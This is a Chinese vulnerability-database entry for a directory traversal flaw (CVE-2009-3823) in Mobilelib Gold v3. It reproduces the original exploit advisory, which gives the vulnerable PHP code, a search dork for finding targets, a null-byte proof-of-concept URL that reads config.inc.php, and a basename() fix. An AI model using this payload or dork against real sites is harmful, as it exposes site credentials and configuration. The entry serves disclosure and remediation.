Ac4p mobilelib_gold 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118107 漏洞类型 路径遍历
发布时间 2009-07-14 更新时间 2009-07-14
CVE编号 CVE-2009-3823 CNNVD-ID CNNVD-200910-414
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/9144
https://www.securityfocus.com/bid/44186
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200910-414
|漏洞详情
MobilelibGOLD3.0版本的myhtml.php中存在一个目录遍历漏洞。攻击者首先需要上传一个恶意文件或注入任意指令到现有的文件,然后通过使用GLOBALS[page]参数,来发送一个特制的URL请求到myhtml.php脚本,以便确定一个来自本地系统的恶意文件。成功利用此漏洞可以在易受攻击的web服务器上获取敏感信息或执行任意代码。
|漏洞EXP
||          ||   | ||
                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
                                    (  :  /    (_)    /           (      .

                                             ___________________
                                           _/QQQQQQQQQQQQQQQQQQQ\__
                                        __/QQQ/````````````````\QQQ\___
                                      _/QQQQQ/                  \QQQQQQ\
                                     /QQQQ/``                    ```QQQQ\
                                    /QQQQ/                          \QQQQ\
                                   |QQQQ/    By  Qabandi             \QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
                                    \QQQQ\                      __  /QQQQ/
                                     \QQQQ\                    /QQ\_QQQQ/
                                      \QQQQ\                   \QQQQQQQ/
                                       \QQQQQ\                 /QQQQQ/_
                                        ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                           ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                              ```````````````````     `````

=Vuln:		Mobilelib Gold v3 Local File Disclosure Vulnerability
=INFO:		http://www.ac4p.com/
=BUY:  		http://www.ac4p.com/
=Download:      ~~~
=DORK:		intext:"English for dummies"

                                  ____________
                              _-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````

Magic_quotes MUST BE ON :)

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
      {
      if (file_exists("./myhtmlpages/".$page.".html")) {
      $templat="./myhtmlpages/".$page.".html";
      $tempindex=@fopen($templat,"r");
      $html=@fread($tempindex,@filesize($templat));
      @fclose($tempindex);
      } else {
       $html ="<p align=\"center\"> áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.</p>";
      }
      return $html;
}

---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
 We will bypass the security, where it takes all _GET variables and scans if
 they contain harmful tags such as the null char (%00) ..etc
 
 We will bypass it by using an old GLOBALS[] trick ;)


http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00


---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
      {
      $page = basename($page); //<---- Added the good old Basename func ;)
      if (file_exists("./myhtmlpages/".$page.".html")) {
      $templat="./myhtmlpages/".$page.".html";
      $tempindex=@fopen($templat,"r");
      $html=@fread($tempindex,@filesize($templat));
      @fclose($tempindex);
      } else {
       $html ="<p align=\"center\"> áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.</p>";
      }
      return $html;
}


---------------------------------------===--------------------------------------
 ______________________________________________________________________________
/                                                                              \
|      Sec-Code.com ;)  Shru7at Iktshaf al-thaghrat Qareeban!!il7ag sajjil!!   |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                           Salamz to All Muslim Hackers.

# milw0rm.com [2009-07-14]
|受影响的产品
Mobilelib Mobilelib GOLD 3
|参考资料

来源:XF
名称:mobilelib-myhtml-file-include(51713)
链接:http://xforce.iss.net/xforce/xfdb/51713
来源:MILW0RM
名称:9144
链接:http://www.milw0rm.com/exploits/9144